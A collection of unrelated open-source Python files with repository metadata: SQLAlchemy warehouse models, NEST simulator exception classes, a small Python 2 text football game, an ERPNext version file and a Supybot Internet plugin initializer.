class ParticipantProgram(Base):
__tablename__ = 'participant_program'
participant_id = Column(Integer, ForeignKey('participant.participant_id'), primary_key=True)
program_cip = Column(Integer, ForeignKey('program.program_cip'), primary_key=True)
entry_date = Column(Date, nullable=False)
exit_date = Column(Date)
enrolled = Column(Boolean, nullable=False, default=True)
exit_type_id = Column(Integer, ForeignKey('exit_type.type_id'))
obtained_credential = Column(Boolean, nullable=False, default=False)
class ProgramProvider(Base):
__tablename__ = 'program_provider'
program_cip = Column(Integer, ForeignKey('program.program_cip'), primary_key=True)
provider_id = Column(Integer, ForeignKey('provider.provider_id'), primary_key=True)
class Provider(Base):
__tablename__ = 'provider'
provider_id = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
type_id = Column(Integer, ForeignKey('entity_type.type_id'), nullable=False)
programs = relationship('Program', secondary='program_provider')
class Outcome(Base):
__tablename__ = 'outcome'
potential_outcome_id = Column(Integer, primary_key=True)
description = Column(String(250), nullable=False)
programs = relationship('Program', backref='outcome')
class ExitType(Base):
__tablename__ = 'exit_type'
type_id = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
description = Column(String(250))
participant_programs = relationship('ParticipantProgram', backref='exit_type')
class Wage(Base):
__tablename__ = 'wage'
wage_start_date = Column(Date, primary_key=True)
wage_end_date = Column(Date, primary_key=True)
participant_id = Column(Integer, ForeignKey('participant.participant_id'), primary_key=True)
wage_amt = Column(Float, nullable=False)
class EntityType(Base):
__tablename__ = 'entity_type'
type_id = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
description = Column(String(250))
providers = relationship('Provider', backref='entity_type')
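# Illustrative sketch (not part of the original module): the declarative models above can
# be materialized against any SQLAlchemy engine; for a quick local test one might do:
#
#     from sqlalchemy import create_engine
#     engine = create_engine('sqlite://')   # in-memory placeholder; the real warehouse URL differs
#     Base.metadata.create_all(engine)      # emits the DDL for all tables defined above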
|
workforce-data-initiative/tpot-warehouse
|
models/transactional.py
|
Python
|
apache-2.0
| 3,267
|
# -*- coding: utf-8 -*-
#
# hl_api_exceptions.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
class NESTMappedException(type):
"""Metaclass for exception namespace that dynamically creates exception classes.
If a class (self) of this (meta)-type has an unknown attribute requested, __getattr__ defined
below gets called, creating a class with that name (the error name) and with an __init__ taking
commandname and errormessage (as created in the source) which is a closure on the parent and
errorname as well, with a parent of default type (self.default_parent) or
self.parents[errorname] if defined. """
def __getattr__(cls, errorname):
"""Creates a class of type "errorname" which is a child of cls.default_parent or
cls.parents[errorname] if one is defined.
This __getattr__ function also stores the class permanently as an attribute of cls for
re-use where cls is actually the class that triggered the getattr (the class that
NESTMappedException is a metaclass of). """
# Dynamic class construction, first check if we know its parent
if errorname in cls.parents:
parent = getattr(cls, cls.parents[errorname])
else: # otherwise, get the default (SLIException)
parent = cls.default_parent
# and now dynamically construct the new class
# not NESTMappedException, since that would mean the metaclass would let the new class inherit
# this __getattr__, allowing unintended dynamic construction of attributes
newclass = type(
cls.__name__ + '.' + errorname,
(parent,),
{
'__init__': cls.init(parent, errorname),
'__doc__':
"""Dynamically created exception {} from {}.
Created for the namespace: {}.
Parent exception: {}.
""".format(errorname, cls.source, cls.__name__, parent.__name__)
}
)
# Cache for reuse: __getattr__ should now not get called if requested again
setattr(cls, errorname, newclass)
# And now we return the exception
return newclass
class NESTErrors(metaclass=NESTMappedException):
"""Namespace for NEST exceptions, including dynamically created classes from SLI.
Dynamic exception creation is through __getattr__ defined in the metaclass NESTMappedException.
"""
class NESTError(Exception):
"""Base exception class for all NEST exceptions.
"""
def __init__(self, message, *args, **kwargs):
"""Initializer for NESTError base class.
Parameters:
-----------
message: full error message to report.
*args, **kwargs: passed through to Exception base class.
"""
Exception.__init__(self, message, *args, **kwargs)
self.message = message
class SLIException(NESTError):
"""Base class for all exceptions coming from sli.
"""
def __init__(self, commandname, errormessage, errorname='SLIException', *args, **kwargs):
"""Initialize function.
Parameters:
-----------
errorname: error name from SLI.
commandname: command name from SLI.
errormessage: message from SLI.
*args, **kwargs: passed through to NESTErrors.NESTError base class.
"""
message = "{} in {}{}".format(errorname, commandname, errormessage)
NESTErrors.NESTError.__init__(self, message, errorname, commandname, errormessage, *args, **kwargs)
self.errorname = errorname
self.commandname = commandname
self.errormessage = errormessage
class PyNESTError(NESTError):
"""Exceptions produced from Python/Cython code.
"""
pass
@staticmethod
def init(parent, errorname):
""" Static class method to construct init's for SLIException children.
Construct our new init with closure on errorname (as a default value) and parent.
The default value allows the __init__ to be chained and set by the leaf child.
This also moves the parameterization of __init__ away from the class construction logic
and next to the SLIException init.
Parameters:
----------
parent: the ancestor of the class needed to properly walk up the MRO (not possible with super() or
super(type,...) because of the dynamic creation of the function)
(used as a closure on the constructed __init__).
errorname: the class name for information purposes
internally (used as a closure on the constructed __init__).
"""
def __init__(self, commandname, errormessage, errorname=errorname, *args, **kwargs):
# recursively init the parent class: all of this is only needed to properly set errorname
parent.__init__(self, commandname, errormessage, *args, errorname=errorname, **kwargs)
docstring = \
"""Initialization function.
Parameters:
-----------
commandname: sli command name.
errormessage: sli error message.
errorname: set by default ("{}") or passed in by child (shouldn't be explicitly set
when creating an instance)
*args, **kwargs: passed through to base class.
self will be a descendant of {}.
""".format(errorname, parent.__name__)
try:
__init__.__doc__ = docstring
except AttributeError:
__init__.__func__.__doc__ = docstring
return __init__
# source: the dynamically created exceptions come from SLI
# default_parent: the dynamically created exceptions are descended from SLIException
# parents: unless they happen to be mapped in this list to another exception descended from SLIException
# these should be updated when new exceptions in sli are created that aren't directly descended
# from SLIException (but nothing bad will happen, it's just that otherwise they'll be directly
# descended from SLIException instead of an intermediate exception; they'll still be constructed
# and useable)
source = "SLI"
default_parent = SLIException
parents = {
'TypeMismatch': 'InterpreterError',
'SystemSignal': 'InterpreterError',
'RangeCheck': 'InterpreterError',
'ArgumentType': 'InterpreterError',
'BadParameterValue': 'SLIException',
'DictError': 'InterpreterError',
'UndefinedName': 'DictError',
'EntryTypeMismatch': 'DictError',
'StackUnderflow': 'InterpreterError',
'IOError': 'SLIException',
'UnaccessedDictionaryEntry': 'DictError',
'UnknownModelName': 'KernelException',
'NewModelNameExists': 'KernelException',
'UnknownModelID': 'KernelException',
'ModelInUse': 'KernelException',
'UnknownSynapseType': 'KernelException',
'UnknownNode': 'KernelException',
'NoThreadSiblingsAvailable': 'KernelException',
'LocalNodeExpected': 'KernelException',
'NodeWithProxiesExpected': 'KernelException',
'UnknownReceptorType': 'KernelException',
'IncompatibleReceptorType': 'KernelException',
'UnknownPort': 'KernelException',
'IllegalConnection': 'KernelException',
'InexistentConnection': 'KernelException',
'UnknownThread': 'KernelException',
'BadDelay': 'KernelException',
'UnexpectedEvent': 'KernelException',
'UnsupportedEvent': 'KernelException',
'BadProperty': 'KernelException',
'BadParameter': 'KernelException',
'DimensionMismatch': 'KernelException',
'DistributionError': 'KernelException',
'SimulationError': 'KernelException',
'InvalidDefaultResolution': 'KernelException',
'InvalidTimeInModel': 'KernelException',
'StepMultipleRequired': 'KernelException',
'TimeMultipleRequired': 'KernelException',
'GSLSolverFailure': 'KernelException',
'NumericalInstability': 'KernelException',
'KeyError': 'KernelException',
'MUSICPortUnconnected': 'KernelException',
'MUSICPortHasNoWidth': 'KernelException',
'MUSICPortAlreadyPublished': 'KernelException',
'MUSICSimulationHasRun': 'KernelException',
'MUSICChannelUnknown': 'KernelException',
'MUSICPortUnknown': 'KernelException',
'MUSICChannelAlreadyMapped': 'KernelException'
}
# So we don't break any code that currently catches a nest.NESTError
NESTError = NESTErrors.NESTError
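# Illustrative usage sketch (not part of the original module): because NESTMappedException
# creates and caches exception classes on first attribute access, callers can catch SLI
# errors by name even though those classes are never written out above, e.g.
#
#     try:
#         some_sli_command()                        # hypothetical call that fails inside SLI
#     except NESTErrors.UnknownModelName as err:    # class built on first lookup, then cached
#         print(err.errorname, err.commandname, err.errormessage)
#
# 'some_sli_command' is a placeholder; the attributes used in the except block are the
# ones set by SLIException.__init__ above.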
|
weidel-p/nest-simulator
|
pynest/nest/lib/hl_api_exceptions.py
|
Python
|
gpl-2.0
| 9,411
|
from sys import exit


def eighteenbox_shot():
    print "Shoot the ball. Here is your chance to score."
    next = raw_input(">")
    if "0" in next or "5" in next:
        in_score = int(next)
    else:
        dead("Man, you lost an open chance")
    if in_score < 7:
        print "Goaaaal. Perfect shot"
        exit(0)
    else:
        dead("Shot saved by the keeper")


def mid_field():
    print "You're in the mid-field chasing the ball"
    print "The opponent has the ball. Get it"
    print "How are you going to tackle him?"
    ball_taken = False
    while True:
        next = raw_input(">")
        if next == "press zero":
            dead("This is a foul. You get a red card")
        elif next == "press five" and not ball_taken:
            print "Ball taken and opponent left for dead"
            ball_taken = True
        elif next == "press five" and ball_taken:
            dead("The opponent was too strong for you.")
        elif next == "shoot ball":
            eighteenbox_shot()
        else:
            print "I don't know what to do with the ball"


def loop_ball():
    print "You decide to loop the ball past the goal-keeper"
    print "If the keeper gets a glimpse of the ball it goes out. No goal"
    print "Do you loop or place?"
    next = raw_input(">")
    if "loop" in next:
        start()
    elif "place" in next:
        dead("That's too easy for the keeper!")
    else:
        loop_ball()


def dead(why):
    print why, "Good shot"
    exit(0)


def start():
    print "You have the ball in the 18-yard box"
    print "You can either loop the ball or fire a shot"
    print "Which one do you take?"
    next = raw_input(">")
    if next == "shoot":
        eighteenbox_shot()
    elif next == "loop":
        loop_ball()
    else:
        dead("You stumble about and the ball is taken by the defender")


start()
|
vinnie91/loopgame.py
|
loopgame.py
|
Python
|
gpl-3.0
| 2,115
|
from __future__ import unicode_literals
__version__ = '5.2.0'
|
netfirms/erpnext
|
erpnext/__version__.py
|
Python
|
agpl-3.0
| 62
|
###
# Copyright (c) 2003-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
Provides some internet-related commands.
"""
import supybot
import supybot.world as world
# Use this for the version of this plugin. You may wish to put a CVS keyword
# in here if you're keeping the plugin in CVS or some similar system.
__version__ = "%%VERSION%%"
__author__ = supybot.authors.jemfinch
# This is a dictionary mapping supybot.Author instances to lists of
# contributions.
__contributors__ = {supybot.authors.jamessan: ['whois']}
from . import config
from . import plugin
from imp import reload
reload(plugin) # In case we're being reloaded.
# Add more reloads here if you add third-party modules and want them to be
# reloaded when this plugin is reloaded. Don't forget to import them as well!
if world.testing:
from . import test
Class = plugin.Class
configure = config.configure
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
ProgVal/Limnoria-test
|
plugins/Internet/__init__.py
|
Python
|
bsd-3-clause
| 2,466
|